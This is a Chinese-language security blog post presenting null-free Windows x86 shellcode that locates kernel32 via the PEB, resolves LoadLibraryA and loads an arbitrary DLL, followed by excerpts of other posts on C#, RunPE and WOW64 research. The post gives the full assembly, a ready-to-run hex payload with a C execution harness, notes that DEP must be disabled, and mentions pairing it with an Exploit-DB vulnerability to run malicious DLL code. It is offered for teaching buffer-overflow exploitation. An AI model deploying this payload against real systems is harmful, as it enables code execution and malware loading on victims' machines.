Windows x86 LoadLibraryA Shellcode(Null-Free)

-

murmur

因為部分課程緣故需要展示 Buffer Overflow 可以幹嘛,但是不想包太長的 Shellcode、單純 Demo 彈小算盤好像又太弱了XD。所以拿網路上別人寫好的 Shellcode 小改了一下,分享出來原始 Assembly Code 方便之後有需要的人可以做修改、開發自己的 Shellcode。

Cheat Engine AutoASM 腳本

// windows x86 LoadLibraryA("xxx.dll")
// author: aaaddress1@chroot.org
alloc(script, 1024)

script:
xor edx,edx
mov dl,30
mov edx,fs:[edx]
mov edx,[edx+0C]
mov edx,[edx+1C]
mov eax,[edx+08]
mov esi,[edx+20]
mov edx,[edx]
cmp byte ptr [esi+0C], 33 /* kernel'3'2.dll -> 0x33 */
db 75 f2 // jne -0x0d

mov    edi,eax //eax = handle of kernel32.dll
add    edi,DWORD PTR [eax+0x3c]
mov    edx,DWORD PTR [edi+0x78]
add    edx,eax
mov    edi,DWORD PTR [edx+0x20]
add    edi,eax
xor    ebp,ebp
mov    esi,DWORD PTR [edi+ebp*4]
add    esi,eax
inc    ebp
//esi = API name
cmp    DWORD PTR [esi],0x64616f4c
db 75 f2
cmp    DWORD PTR [esi+0x8],0x41797261
db 75 e9

mov    edi,DWORD PTR [edx+0x24]
add    edi,eax
mov    bp,WORD PTR [edi+ebp*2] //bp = index

mov    edi,DWORD PTR [edx+0x1c]
add    edi,eax // Export Table: uint32_t Address[]

mov    edi,[edi+ebp*4-04]
add    edi,eax // Address of LoadLibraryA = edi

push 0x7f6c6c64 // dll\x20
push 0x2e787878 // xxx.
xor dword ptr [esp+07],0x7f
push esp
call edi

HEX Shellcode

當然大部分人應該沒那個需求要小改,
純粹 Demo 的話可以參考下面我已經幫你轉好的十六進位 Shellcode 字串直接使用:

// LoadLibraryA Shellcode Null-Free
// Author: aaaddress1@chroot.org
int main(void) {
 
 char shellcode[] =
  "\x31\xD2\xB2\x30\x64\x8B\x12\x8B" \
  "\x52\x0C\x8B\x52\x1C\x8B\x42\x08" \
  "\x8B\x72\x20\x8B\x12\x80\x7E\x0C" \
  "\x33\x75\xF2\x8B\xF8\x03\x78\x3C" \
  "\x8B\x57\x78\x01\xC2\x8B\x7A\x20" \
  "\x01\xC7\x31\xED\x8B\x34\xAF\x01" \
  "\xC6\x45\x81\x3E\x4C\x6F\x61\x64" \
  "\x75\xF2\x81\x7E\x08\x61\x72\x79" \
  "\x41\x75\xE9\x8B\x7A\x24\x01\xC7" \
  "\x66\x8B\x2C\x6F\x8B\x7A\x1C\x01" \
  "\xC7\x8B\x7C\xAF\xFC\x01\xC7\x68" \
  "\x64\x6C\x6C\x7F\x68\x78\x78\x78" \
  "\x2E\x83\x74\x24\x07\x7F\x54\xFF" \
  "\xD7";
  
 printf("length: %i\n", strlen(shellcode));
 ((void(*)())shellcode)();
}
上面的程式碼存成 *.cpp 拿個隨便編譯器跑起來會像下面這樣
(喔對,記得 DEP 要關喔)

效果


底下是我拿 2016 隨便一個 Exploit-DB 上挖來的漏洞小改一下,大概像這樣XD
Shellcode 觸發後會去載入 xxx.dll,就可以在 DLL 內塞髒東西跑起來啦。

留言

張貼留言

這個網誌中的熱門文章

[C#] Lambda花式應用噁爛寫法(跨UI委派秒幹、多線程處理...etc)

-
為啥會有這篇呢...因為最近寫太多C# 突然發現Lambda對程式碼減化太有幫助了=...= 為了怕哪天老人癡呆忘了這些噁心的花式寫法,就開一篇Blog文紀錄了 以前在寫多線程,可能得這麼寫: void Func() {/*多線程要做的事情*/} //接著呼叫: Thread nThread = new Thread(Func); nThread.Start(); 但今天用Lambda可以改寫: Thread nThread = new Thread(() => {/*多線程要做的事情*/}); nThread.Start(); 甚至在噁心點寫的寫法: new Thread(() => {/*多線程要做的事情*/}).Start(); 簡單來說Lambda的形式可拆解成: ()是指你的函數參數列、然後可用=>代表你要接的Lambda陳述句/塊,最後用{}把事情包起來。 在來就是比較討厭的C#內要做跨UI線程操控UI上物件,會有跨UI安全性線程問題, 所以一般會額外寫個委派函數,然後請求UI Thread去處理這個委派函數請求,才能控制 這樣往往可能只用一兩次的委派函數,卻要占用一個篇幅去寫委派函數 先看看正常的跨UI委派寫法: private delegate void nCallback(string ContentText); public void n(string ContentText) { if (this.InvokeRequired) { nCallback obj = new nCallback(n); this.Invoke(obj, new object[] { ContentText }); return; } this.Text = ContentText; } //調用時呼叫n("str") 就可以改寫成: this.Invoke(new Action(() => { this.Text = "Str"; })); 又因為=>後面可接陳述塊或者陳述句,所...
閱讀完整內容

[Windows] 逆向工程 C++ 中入口函數參數 main(argc, argv) 與如何正確的進行參數劫持

-
圖片
前言 我在 Github 上三年前開源了精簡的以 C/C++ 撰寫的 Windows 執行程式裝載器: aaaddress1/RunPE-In-Memory  用以從記憶體執行以 C/C++ 開發的 *.exe 程式不必以 CreateProcess() 來叫起,算是一種概念性 PoC 啦畢竟這種手段在惡意程式和殼上經常使用,所以寫一寫就丟出來給大家玩 XD 不過有人在我的專案發起了 Issue:既然能從記憶體中執行 *.exe 那能否偽造 *.exe 取得的參數呢?嗯好問題XD 正逢去年蠻忙的所以一直懶得弄,這個月比較閒於是就決定在專案中新增 參數偽造 的功能,這邊簡單提一下 C++ 中 main() 入口所收的 argc 與 argv 來的。 [附註] 以下逆向工程內容以 MinGW 生產的程式為例, 系統逆向工程為 Win10 企業版 1809版  CRTStartup 在 Windows 下通常取得參數通常分為兩種狀況:  WINAPI GetCommandLineW() 系統函數返回字串指針指向當前完整應用程式參數 從 main(argc, argv) 拿回來的參數,那麼第二種狀況在編譯器是怎麼吐參數給開發者 main 入口的呢? 在編譯器吐出執行程式後,連結器會生產一段 CRTStartup 的函數用於做一些基礎的例如像是 Security Cookies、Control Flow Guard 保護的初始化,在一系列初始化之後 .data 段的全域變數 _argv、argc 紀錄著要傳入給開發者入口函數的 參數陣列 與 數量,就以參數形式呼叫 main() 函數 好問題,那這兩個全域變數是在哪裡被初始化的? 你會發現以 MinGW 為例的話,會去呼叫 msvcrt!__getmainargs() 來取得參數資訊保存到 .data 全域變數上,後續再傳遞給 main() 函數;如果是 VC++ 吐出來的則是直接呼叫 GetCommandLineW() 在做文字切割取出參數 MSVCRT MSVCRT.dll 有導出一系列 C 函數是引用 #include <stdio.h> 時會用到的,例如 printf, sprintf, gets 等等。...
閱讀完整內容

重建天堂之門:從 32 位元地獄一路打回天堂聖地(上)深度逆向工程 WOW64 設計

-
圖片
前言 這份研究是從去年底開始摸的,主因是一直對 Windows 如何實作 WOW64 兼容架構覺得有意思,並且坊間蠻多開源的天堂之門專案都死掉了 QQ 所以才打算自己完全重新逆向工程分析過一次。 逆向整個 WOW64 架構可以發現很多蠻有意思的問題,比方說 Intel 晶片指令集模式切換、記憶體模擬分配、WOW64 偽造的原生 32-bit 環境,例如 System32 在 32-bit 下會被重導向至 SysWOW64 到底在哪一層實作重導向的呢 ;)  此研究也運氣不錯分別被國內研討會 CYBERSEC 收錄為 《重建天堂之門:從 32bit 地獄一路打回天堂聖地》 與 HITB(Hack In The Box Security Conference)收錄為  《WoW Hell: Rebuilding Heavens Gate》 若對線上演講內容有興趣可以參考 Youtube 上 HITB 的直撥串流  HITB2021AMS D1T2 - WoW Hell: Rebuilding Heavens Gate - ShengHao Ma   不過我英文很破能不看就不看啦 由於整份演講內容想提的細節太多了,所以本部落格文拆成上下兩集。 當前本文是上集,會講述完整逆向工程整套微軟設計的 WOW64 架構怎麼設計的 。而下集《 重建天堂之門:從 32 位元地獄一路打回天堂聖地(下)攻擊篇:x96 Shellcode、天堂聖杯 & 天堂注入器 》會著重在我今年發表出來的幾個有趣的攻擊點 :) 如果對天堂之門技術已經很熟的大佬,可以跳過本文看下一集了 <(_ _)> *注意* 本份研究在 2021/06/11 是基於 Windows 10 Enterprise 最新版本逆向工程結果所紀錄, 可能與讀者電腦中反編譯出來的結果有所出入是正常的 。筆者實測了同樣是 Windows 10 但不同組建版本在組合語言層級皆有些許差異,不過各個函數設計用途是固定且規律的、不會因版本而有所差異。 而整份研究不限但至少涉及了以下已知文獻,蠻值得一看的 2011 -  Mixing x86 with x64 code by ReWolf 2012 -  Knockin’ on Heaven’s Gate by georg...
閱讀完整內容